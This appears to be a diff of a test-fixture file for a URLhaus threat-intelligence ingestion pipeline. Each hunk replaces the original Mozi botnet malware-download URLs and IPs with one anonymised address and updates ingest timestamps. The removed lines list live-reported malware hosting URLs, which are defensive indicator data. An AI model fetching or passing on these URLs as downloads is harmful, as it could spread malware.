@@ -7338,18 +7338,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.102.83.85:49772/Mozi.m", + "original": "http://89.160.20.156:49772/Mozi.m", "scheme": "http", "port": 49772, - "domain": "119.102.83.85", - "full": "http://119.102.83.85:49772/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49772/Mozi.m" }, - "ip": "119.102.83.85" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693070613Z", - "original": "{\"id\":\"961396\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961396/\",\"url\":\"http://119.102.83.85:49772/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.102.83.85\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025599800Z", + "original": "{\"id\":\"961396\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961396/\",\"url\":\"http://89.160.20.156:49772/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7387,18 +7387,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.165.246:50229/Mozi.m", + "original": "http://89.160.20.156:50229/Mozi.m", "scheme": "http", "port": 50229, - "domain": "117.222.165.246", - "full": "http://117.222.165.246:50229/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50229/Mozi.m" }, - "ip": "117.222.165.246" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693073879Z", - "original": "{\"id\":\"961391\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961391/\",\"url\":\"http://117.222.165.246:50229/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.165.246\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025607300Z", + "original": "{\"id\":\"961391\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961391/\",\"url\":\"http://89.160.20.156:50229/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7436,18 +7436,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.170.34:39996/Mozi.m", + "original": "http://89.160.20.156:39996/Mozi.m", "scheme": "http", "port": 39996, - "domain": "117.222.170.34", - "full": "http://117.222.170.34:39996/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39996/Mozi.m" }, - "ip": "117.222.170.34" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693077666Z", - "original": "{\"id\":\"961392\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961392/\",\"url\":\"http://117.222.170.34:39996/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.222.170.34\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025614200Z", + "original": "{\"id\":\"961392\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961392/\",\"url\":\"http://89.160.20.156:39996/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7485,18 +7485,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://113.239.210.87:50195/Mozi.a", + "original": "http://89.160.20.156:50195/Mozi.a", "scheme": "http", "port": 50195, - "domain": "113.239.210.87", - "full": "http://113.239.210.87:50195/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50195/Mozi.a" }, - "ip": "113.239.210.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693081043Z", - "original": "{\"id\":\"961387\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961387/\",\"url\":\"http://113.239.210.87:50195/Mozi.a\",\"url_status\":\"online\",\"host\":\"113.239.210.87\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025621100Z", + "original": "{\"id\":\"961387\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961387/\",\"url\":\"http://89.160.20.156:50195/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7534,18 +7534,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.62.159.229:52447/Mozi.a", + "original": "http://89.160.20.156:52447/Mozi.a", "scheme": "http", "port": 52447, - "domain": "115.62.159.229", - "full": "http://115.62.159.229:52447/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52447/Mozi.a" }, - "ip": "115.62.159.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693084229Z", - "original": "{\"id\":\"961388\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961388/\",\"url\":\"http://115.62.159.229:52447/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.62.159.229\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025628Z", + "original": "{\"id\":\"961388\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961388/\",\"url\":\"http://89.160.20.156:52447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7583,18 +7583,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.90.237.126:56321/Mozi.m", + "original": "http://89.160.20.156:56321/Mozi.m", "scheme": "http", "port": 56321, - "domain": "113.90.237.126", - "full": "http://113.90.237.126:56321/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56321/Mozi.m" }, - "ip": "113.90.237.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693087314Z", - "original": "{\"id\":\"961389\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961389/\",\"url\":\"http://113.90.237.126:56321/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.90.237.126\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025634900Z", + "original": "{\"id\":\"961389\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961389/\",\"url\":\"http://89.160.20.156:56321/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7632,18 +7632,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.219.146.151:54620/Mozi.m", + "original": "http://89.160.20.156:54620/Mozi.m", "scheme": "http", "port": 54620, - "domain": "115.219.146.151", - "full": "http://115.219.146.151:54620/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54620/Mozi.m" }, - "ip": "115.219.146.151" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693090480Z", - "original": "{\"id\":\"961390\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961390/\",\"url\":\"http://115.219.146.151:54620/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.219.146.151\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025641700Z", + "original": "{\"id\":\"961390\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961390/\",\"url\":\"http://89.160.20.156:54620/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7681,18 +7681,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://60.7.65.79:52064/Mozi.a",
+ "original": "http://89.160.20.156:52064/Mozi.a",
 "scheme": "http",
 "port": 52064,
- "domain": "60.7.65.79",
- "full": "http://60.7.65.79:52064/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52064/Mozi.a"
 },
- "ip": "60.7.65.79"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693093726Z",
- "original": "{\"id\":\"961386\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961386/\",\"url\":\"http://60.7.65.79:52064/Mozi.a\",\"url_status\":\"online\",\"host\":\"60.7.65.79\",\"date_added\":\"2021-01-14 20:23:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025648600Z",
+ "original": "{\"id\":\"961386\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961386/\",\"url\":\"http://89.160.20.156:52064/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:23:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -7730,18 +7730,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.93.16.88:47401/Mozi.m",
+ "original": "http://89.160.20.156:47401/Mozi.m",
 "scheme": "http",
 "port": 47401,
- "domain": "59.93.16.88",
- "full": "http://59.93.16.88:47401/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47401/Mozi.m"
 },
- "ip": "59.93.16.88"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693097113Z",
- "original": "{\"id\":\"961385\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961385/\",\"url\":\"http://59.93.16.88:47401/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.16.88\",\"date_added\":\"2021-01-14 20:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025655300Z",
+ "original": "{\"id\":\"961385\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961385/\",\"url\":\"http://89.160.20.156:47401/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -7779,18 +7779,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.95.174.61:46527/Mozi.m",
+ "original": "http://89.160.20.156:46527/Mozi.m",
 "scheme": "http",
 "port": 46527,
- "domain": "59.95.174.61",
- "full": "http://59.95.174.61:46527/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46527/Mozi.m"
 },
- "ip": "59.95.174.61"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693100860Z",
- "original": "{\"id\":\"961382\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961382/\",\"url\":\"http://59.95.174.61:46527/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.95.174.61\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025662500Z",
+ "original": "{\"id\":\"961382\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961382/\",\"url\":\"http://89.160.20.156:46527/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -7828,18 +7828,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.93.21.239:38132/Mozi.m",
+ "original": "http://89.160.20.156:38132/Mozi.m",
 "scheme": "http",
 "port": 38132,
- "domain": "59.93.21.239",
- "full": "http://59.93.21.239:38132/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38132/Mozi.m"
 },
- "ip": "59.93.21.239"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693104316Z",
- "original": "{\"id\":\"961383\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961383/\",\"url\":\"http://59.93.21.239:38132/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.21.239\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025669400Z",
+ "original": "{\"id\":\"961383\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961383/\",\"url\":\"http://89.160.20.156:38132/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -7877,18 +7877,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://45.176.111.252:59015/Mozi.m",
+ "original": "http://89.160.20.156:59015/Mozi.m",
 "scheme": "http",
 "port": 59015,
- "domain": "45.176.111.252",
- "full": "http://45.176.111.252:59015/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59015/Mozi.m"
 },
- "ip": "45.176.111.252"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693107663Z",
- "original": "{\"id\":\"961384\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961384/\",\"url\":\"http://45.176.111.252:59015/Mozi.m\",\"url_status\":\"online\",\"host\":\"45.176.111.252\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025676600Z",
+ "original": "{\"id\":\"961384\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961384/\",\"url\":\"http://89.160.20.156:59015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -7926,18 +7926,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://222.137.176.198:59454/Mozi.m",
+ "original": "http://89.160.20.156:59454/Mozi.m",
 "scheme": "http",
 "port": 59454,
- "domain": "222.137.176.198",
- "full": "http://222.137.176.198:59454/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59454/Mozi.m"
 },
- "ip": "222.137.176.198"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693110979Z",
- "original": "{\"id\":\"961379\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961379/\",\"url\":\"http://222.137.176.198:59454/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.176.198\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025683400Z",
+ "original": "{\"id\":\"961379\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961379/\",\"url\":\"http://89.160.20.156:59454/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -7975,18 +7975,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.232.233.146:37883/Mozi.m",
+ "original": "http://89.160.20.156:37883/Mozi.m",
 "scheme": "http",
 "port": 37883,
- "domain": "42.232.233.146",
- "full": "http://42.232.233.146:37883/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37883/Mozi.m"
 },
- "ip": "42.232.233.146"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693114205Z",
- "original": "{\"id\":\"961380\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961380/\",\"url\":\"http://42.232.233.146:37883/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.232.233.146\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025690300Z",
+ "original": "{\"id\":\"961380\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961380/\",\"url\":\"http://89.160.20.156:37883/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8024,18 +8024,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.234.255.164:55209/Mozi.m",
+ "original": "http://89.160.20.156:55209/Mozi.m",
 "scheme": "http",
 "port": 55209,
- "domain": "42.234.255.164",
- "full": "http://42.234.255.164:55209/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:55209/Mozi.m"
 },
- "ip": "42.234.255.164"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693117341Z",
- "original": "{\"id\":\"961381\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961381/\",\"url\":\"http://42.234.255.164:55209/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.234.255.164\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025698700Z",
+ "original": "{\"id\":\"961381\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961381/\",\"url\":\"http://89.160.20.156:55209/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8073,18 +8073,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.59.96.114:41062/Mozi.m",
+ "original": "http://89.160.20.156:41062/Mozi.m",
 "scheme": "http",
 "port": 41062,
- "domain": "182.59.96.114",
- "full": "http://182.59.96.114:41062/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41062/Mozi.m"
 },
- "ip": "182.59.96.114"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693120397Z",
- "original": "{\"id\":\"961378\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961378/\",\"url\":\"http://182.59.96.114:41062/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.59.96.114\",\"date_added\":\"2021-01-14 20:21:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025705900Z",
+ "original": "{\"id\":\"961378\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961378/\",\"url\":\"http://89.160.20.156:41062/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8122,18 +8122,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://211.226.185.30:60380/i",
+ "original": "http://89.160.20.156:60380/i",
 "scheme": "http",
 "port": 60380,
- "domain": "211.226.185.30",
- "full": "http://211.226.185.30:60380/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60380/i"
 },
- "ip": "211.226.185.30"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693124103Z",
- "original": "{\"id\":\"961377\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961377/\",\"url\":\"http://211.226.185.30:60380/i\",\"url_status\":\"online\",\"host\":\"211.226.185.30\",\"date_added\":\"2021-01-14 20:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.025712700Z",
+ "original": "{\"id\":\"961377\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961377/\",\"url\":\"http://89.160.20.156:60380/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8171,18 +8171,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://195.87.190.106:54796/Mozi.m",
+ "original": "http://89.160.20.156:54796/Mozi.m",
 "scheme": "http",
 "port": 54796,
- "domain": "195.87.190.106",
- "full": "http://195.87.190.106:54796/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:54796/Mozi.m"
 },
- "ip": "195.87.190.106"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693127340Z",
- "original": "{\"id\":\"961375\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961375/\",\"url\":\"http://195.87.190.106:54796/Mozi.m\",\"url_status\":\"online\",\"host\":\"195.87.190.106\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.025719700Z",
+ "original": "{\"id\":\"961375\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961375/\",\"url\":\"http://89.160.20.156:54796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -8220,18 +8220,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://183.188.139.70:35251/Mozi.m",
+ "original": "http://89.160.20.156:35251/Mozi.m",
 "scheme": "http",
 "port": 35251,
- "domain": "183.188.139.70",
- "full": "http://183.188.139.70:35251/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35251/Mozi.m"
 },
- "ip": "183.188.139.70"
+ "ip": "89.160.20.156"
 }
 },
